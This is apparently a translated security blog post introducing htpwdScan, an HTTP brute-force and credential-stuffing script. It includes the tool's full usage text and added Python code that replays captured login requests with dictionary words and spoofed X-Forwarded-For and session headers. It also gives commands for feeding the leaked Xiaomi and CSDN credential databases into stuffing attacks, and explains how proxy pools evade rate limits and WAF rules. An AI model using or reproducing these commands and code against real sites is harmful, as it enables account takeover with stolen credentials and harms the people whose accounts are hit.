lijiejie, who earlier shared the subdomain enumeration tool subDomainsBrute ("subDomainsBrute: a Python script for faster brute-force enumeration of subdomains during penetration testing"), now brings us htpwdScan.
htpwdScan is a simple HTTP brute-force and credential-stuffing (撞库) script:
1. Bulk import and checking of HTTP proxies. Rotating requests through a proxy pool at a low per-IP rate succeeds against most sites, because per-IP rate limiting and most WAF blocking rules never see enough requests from any single address to trigger (it does nothing against account lockout or CAPTCHA, which have to be dealt with separately).
2. Direct import of leaked credential databases (社工库) found on the internet, to launch a credential-stuffing attack.
3. Import of large dictionaries.
4. Other small conveniences: random X-Forwarded-For, random session ID, HTTP Basic authentication, MD5-hashed dictionary values, etc.
A few simple examples follow.
HTTP Basic authentication
htpwdScan.py -u=http://auth.58.com/ -basic user.txt password.txt
Imports a username dictionary (user.txt) and a password dictionary (password.txt) and brute-forces the site's HTTP Basic authentication.
Form cracking
htpwdScan.py -f post2.txt -d passwd=password.txt -err="success\":false"
Imports the captured HTTP request from post2.txt. passwd is the parameter to crack and password.txt is the dictionary file holding the candidate passwords. success":false is the chosen failure token: a response containing it is counted as a failed login, so a response without it is reported as a hit. If the token contains double quotes, escape them with a backslash (\").
GET parameter cracking
htpwdScan.py -d passwd=password.txt -u="http://xxx.com/inside.php?m=login&username=test&passwd=test" -get -err="success\":false"
-get tells the script to send GET requests; the passwd value in the query string is replaced with each dictionary entry in turn, and the failure token works exactly as in the POST case.
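To make the form and GET examples above concrete, here is an added example, written for this page and not taken from htpwdScan, of the mechanics those commands rely on: parse a captured request file, substitute one parameter with each dictionary word (optionally hashed, as -d pass=md5(pass.dic) does), add the randomised X-Forwarded-For and session-ID headers behind -fip/-fsid, and classify each response by the -err/-suc tokens. The network call is a pluggable `send` callable so it runs offline; the captured request, the dictionary and `fake_login_server` are constructed samples, and the md5_16 convention is an assumption.

```python
"""Added example (not htpwdScan's own code) of the form/GET cracking shown above: parse a
captured request, replace one parameter with each dictionary word (optionally hashed, like
-d pass=md5(pass.dic)), add the -fip/-fsid spoofing headers and classify responses by the
-err/-suc tokens. `send` is pluggable so it runs offline; the request, dictionary and
fake_login_server below are constructed samples, not a real site."""
import hashlib
import random
import string
from urllib.parse import parse_qsl, urlencode

# Constructed capture of a login POST (the contents of a post2.txt); the host is fictitious.
CAPTURED_REQUEST = ("POST /inside.php?m=login HTTP/1.1\r\n"
                    "Host: www.example.com\r\n"
                    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                    "username=test&passwd=test")
DICTIONARY = ["123456", "password", "letmein", "qwerty"]  # constructed sample dictionary
# Dictionary hashing as in -d pass=md5(pass.dic); md5_16 assumed to be the middle 16 hex chars.
HASHERS = {"md5": lambda s: hashlib.md5(s).hexdigest(),
           "md5_16": lambda s: hashlib.md5(s).hexdigest()[8:24],
           "sha1": lambda s: hashlib.sha1(s).hexdigest()}


def parse_raw_request(raw):
    """Split a captured HTTP request into (METHOD, path, headers dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return method.upper(), path, headers, body.strip()


def candidates(words, hash_name=None):
    """Yield (plain word, value actually sent)."""
    for w in words:
        yield w, (HASHERS[hash_name](w.encode()) if hash_name else w)


def spoof_headers(headers, sid_name=None):
    """Copy of the headers with a random X-Forwarded-For (-fip) and, if sid_name is
    given, a fresh random session cookie (-fsid), so no two requests look alike."""
    h = dict(headers)
    h["X-Forwarded-For"] = ".".join(str(random.randint(1, 254)) for _ in range(4))
    if sid_name:
        alphabet = string.ascii_lowercase + string.digits
        h["Cookie"] = "%s=%s" % (sid_name, "".join(random.choice(alphabet) for _ in range(26)))
    return h


def classify(body, err=(), suc=()):
    """'hit' if a success token is present (or, with only -err given, no failure token is);
    'miss' if a failure token is present (or, with only -suc given, no success token is)."""
    if any(tok in body for tok in suc):
        return "hit"
    if any(tok in body for tok in err):
        return "miss"
    if err and not suc:
        return "hit"
    if suc and not err:
        return "miss"
    return "unknown"


def brute_force(raw_request, param, words, send, err=(), suc=(), hash_name=None,
                no302=False, sid_name=None):
    """Replay the captured request once per word with `param` replaced; return the hits.
    send(method, path, headers, body) -> (status, headers, body). GET requests (the -get
    case) are rewritten in the query string, POST requests in the body."""
    method, path, headers, body = parse_raw_request(raw_request)
    base, _, query = path.partition("?")
    form = dict(parse_qsl(query if method == "GET" else body, keep_blank_values=True))
    if param not in form:
        raise KeyError("parameter %r is not in the captured request" % param)
    hits = []
    for word, value in candidates(words, hash_name):
        form[param] = value
        encoded = urlencode(form)
        req_path, req_body = (base + "?" + encoded, "") if method == "GET" else (path, encoded)
        h = spoof_headers(headers, sid_name)
        h["Content-Length"] = str(len(req_body))
        status, _resp_headers, resp_body = send(method, req_path, h, req_body)
        # htpwdScan's default: a 302 redirect after login counts as success unless -no302.
        verdict = "hit" if (status == 302 and not no302) else classify(resp_body, err, suc)
        if verdict == "hit":
            hits.append(word)
    return hits


def fake_login_server(method, path, headers, body):
    """Constructed stand-in for the target: only username=test with passwd=md5('letmein')
    logs in; everything else gets the JSON failure that the -err token success":false matches."""
    form = dict(parse_qsl(path.partition("?")[2] if method == "GET" else body))
    if form.get("username") == "test" and form.get("passwd") == hashlib.md5(b"letmein").hexdigest():
        return 200, {}, '{"success":true}'
    return 200, {}, '{"success":false,"msg":"username or password incorrect"}'


if __name__ == "__main__":
    # Equivalent of: htpwdScan.py -f post2.txt -d passwd=md5(password.txt) -err="success\":false" -fip -fsid PHPSESSID
    print(brute_force(CAPTURED_REQUEST, "passwd", DICTIONARY, fake_login_server,
                      err=['success":false'], hash_name="md5", sid_name="PHPSESSID"))
```

Two things worth noticing when choosing tokens: with only -err given, any response that lacks the failure string is reported as a hit, so a WAF block page or an error page will produce false positives (that is what the -rtxt/-rheader retry options are for), and a 302 redirect is taken as success by default, so sites that redirect on failure need -no302 plus an explicit -suc token.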
Credential-stuffing attack
htpwdScan.py -f=post.txt -database loginname,passwd=xiaomi.txt -regex="(\S+)\s+(\S+)" -err="用户名或密码错误" -fip
htpwdScan.py -f=post.txt -database passwd,loginname=csdn.net.sql -regex="\S+ # (\S+) # (\S+)" -err="用户名或密码错误" -fip
Launches a credential-stuffing attack with the leaked Xiaomi and CSDN databases. post.txt holds the captured HTTP request. -regex sets the regular expression used to extract the values from each line of the database file; every value must be captured as a group, i.e. wrapped in parentheses (). Xiaomi's rows have the format "<email address> <whitespace> <password>", so (\S+)\s+(\S+) takes the first run of non-whitespace characters to fill loginname and the second to fill passwd. CSDN's rows have the format "zdg # 12344321 # <email address>"; the regex \S+ # (\S+) # (\S+) assigns the non-blank string after the first # to passwd and the one after the second # to loginname. Note that the order of the parameter names in -database must match the order of the regex groups. -err sets the failure token (here the site's "username or password incorrect" text) and -fip adds a random X-Forwarded-For header to every request.
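The -database/-regex pairing above is easy to get wrong, so here is an added example (written for this page, not htpwdScan's code) of the mapping it describes: each regex group is assigned to the parameter names in the order they are listed, which is why passwd,loginname pairs with a regex whose first group is the password. The two dump snippets are constructed samples in the row formats described above, each with one unparseable line.

```python
"""Added example (not htpwdScan's code) of how -database NAME1,NAME2=FILE and -regex turn
lines of a leaked credential dump into request parameters: regex groups are zipped onto the
parameter names in the order given. Both dump snippets are constructed samples."""
import re
from urllib.parse import urlencode

# Constructed sample in the "email<whitespace>password" row format, with one broken line
# and one duplicate row (common in merged dumps).
XIAOMI_SAMPLE = (
    "alice@example.com hunter2\n"
    "bob@example.com\t123456\n"
    "this-line-has-no-password\n"
    "alice@example.com hunter2\n"
)
# Constructed sample in the "user # password # email" row format.
CSDN_SAMPLE = (
    "zdg # 12344321 # zdg@example.net\n"
    "carol # qwerty # carol@example.org\n"
    "broken line without separators\n"
)


def parse_database_arg(spec):
    """Parse 'loginname,passwd=xiaomi.txt' into (['loginname', 'passwd'], 'xiaomi.txt')."""
    names, sep, path = spec.partition("=")
    if not sep or not path:
        raise ValueError("expected NAME1,NAME2=FILE, got %r" % spec)
    return [n.strip() for n in names.split(",")], path


def extract_records(lines, param_names, regex):
    """Apply regex to each dump line and zip its groups onto param_names, in order.
    Returns (records, skipped): records are deduplicated dicts ready to be placed into
    the captured request; skipped counts lines the regex did not match. A group count
    that differs from the number of names is rejected up front."""
    pattern = re.compile(regex)
    if pattern.groups != len(param_names):
        raise ValueError("regex has %d groups but %d parameter names were given"
                         % (pattern.groups, len(param_names)))
    records, seen, skipped = [], set(), 0
    for line in lines:
        m = pattern.search(line.rstrip("\r\n"))
        if m is None:
            skipped += 1
            continue
        if m.groups() in seen:  # same credential pair again: do not spend a request on it
            continue
        seen.add(m.groups())
        records.append(dict(zip(param_names, m.groups())))
    return records, skipped


def to_form_body(record):
    """Encode one record the way it would be substituted into the request body."""
    return urlencode(record)


if __name__ == "__main__":
    # -database loginname,passwd=xiaomi.txt -regex="(\S+)\s+(\S+)"
    names, _ = parse_database_arg("loginname,passwd=xiaomi.txt")
    recs, skipped = extract_records(XIAOMI_SAMPLE.splitlines(), names, r"(\S+)\s+(\S+)")
    print(recs, "skipped:", skipped)
    # -database passwd,loginname=csdn.net.sql -regex="\S+ # (\S+) # (\S+)"
    names, _ = parse_database_arg("passwd,loginname=csdn.net.sql")
    recs, skipped = extract_records(CSDN_SAMPLE.splitlines(), names, r"\S+ # (\S+) # (\S+)")
    for r in recs:
        print(to_form_body(r))
```

Swapping the names (loginname,passwd with the CSDN regex) does not fail; it silently sends the password as the login name, which is the mistake the note about argument order warns against, so check the first few extracted records with -debug before starting.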
Verifying HTTP proxies
htpwdScan.py -f=post.txt -proxylist=proxies.txt -checkproxy -suc="用户名或密码错误"
Before cracking a site through a proxy pool, bulk-test which proxies can actually reach the target: save the HTTP request to post.txt and use -suc to set a connectivity token. Here the token is the site's normal "username or password incorrect" response, which proves the proxy delivered the request to the login endpoint. A simple, generic check is:
htpwdScan.py -u=http://www.baidu.com -get -proxylist=available.txt -checkproxy -suc="百度一下"
(百度一下 is the text of Baidu's search button, so any proxy whose response contains it is working.)
Full parameter description
The script supports many small features; please read the full usage below. It is recommended to run with -debug first to check that the HTTP request and response look right before launching the real attack.
usage: htpwdScan.py [options]

* An HTTP weak password scanner. by lijiejie *

optional arguments:
  -h, --help            show this help message and exit

Target:
  -u REQUESTURL         Set the target URL, e.g. -u="https://www.test.com/login.php"
  -f REQUESTFILE        Import an HTTP request from a file
  -https                Enable HTTPS (SSL) when importing an HTTP request from a file
  -get                  Use the GET method (default: POST)
  -basic [...]          HTTP Basic authentication brute force, e.g. -basic users.dic pass.dic

Dictionary:
  -d PARAM=DICTFILE [PARAM=DICTFILE ...]
                        Set the dictionary file for a parameter; the hash functions md5, md5_16
                        and sha1 are supported, e.g. -d user=users.dic pass=md5(pass.dic)

Detect:
  -no302                Ignore 302 redirects (by default a 302 redirect is treated as a sign of success)
  -err ERR [ERR ...]    Failure token(s) in the response text, e.g. -err "user not exist" "password wrong"
  -suc SUC [SUC ...]    Success token(s) in the response text, e.g. -suc "welcome," "admin"
  -herr HERR            Failure token in the response HTTP headers
  -hsuc HSUC            Success token in the response HTTP headers
  -rtxt RETRYTEXT       Retry the request if this token appears in the response text, e.g. -rtxt="IP blocked"
  -rntxt RETRYNOTEXT    Retry the request if this token does NOT appear in the response text, e.g. -rntxt="<body>"
  -rheader RETRYHEADER  Retry the request if this token appears in the response headers, e.g. -rheader="Set-Cookie:"
  -rnheader RETRYNOHEADER
                        Retry the request if this token does NOT appear in the response headers, e.g. -rnheader="HTTP/1.1 200 OK"

Proxy and spoof:
  -proxy SERVER:PORT    Set a small number of HTTP proxies, e.g. -proxy=127.0.0.1:8000,8.8.8.8:8000
  -proxylist PROXYLISTFILE
                        Bulk import HTTP proxies from a file, e.g. -proxylist=proxys.txt
  -checkproxy           Check proxy availability; working proxies are written to 001.proxy.servers.txt
  -fip                  Send a random X-Forwarded-For header to spoof the source IP
  -fsid FSID            Generate a random session ID, e.g. -fsid PHPSESSID
  -sleep SECONDS        Wait SECONDS after each HTTP request to avoid having the IP temporarily blocked or blacklisted

Database attack:
  -database DATABASE    Import data from a leaked credential database, e.g. -database user,pass=csdn.txt
  -regex REGEX          Regular expression that extracts the data from the database file; must use groups, e.g. -regex="(\S+)\s+(\S+)"

General:
  -t THREADS            Number of worker threads
  -o OUTPUT             Output file, default: 000.cracked.passwords.txt
  -debug                Debug mode: inspect the HTTP requests and responses
  -nov                  Show successful entries only, no progress output
  -v                    Show the program's version number and exit
Download
Get the script: https://github.com/lijiejie/htpwdScan
Feedback
If you run into any problems while using it, please send me feedback: my[at]lijiejie.com, http://www.lijiejie.com
htpwdScan: a simple HTTP brute-force and credential-stuffing script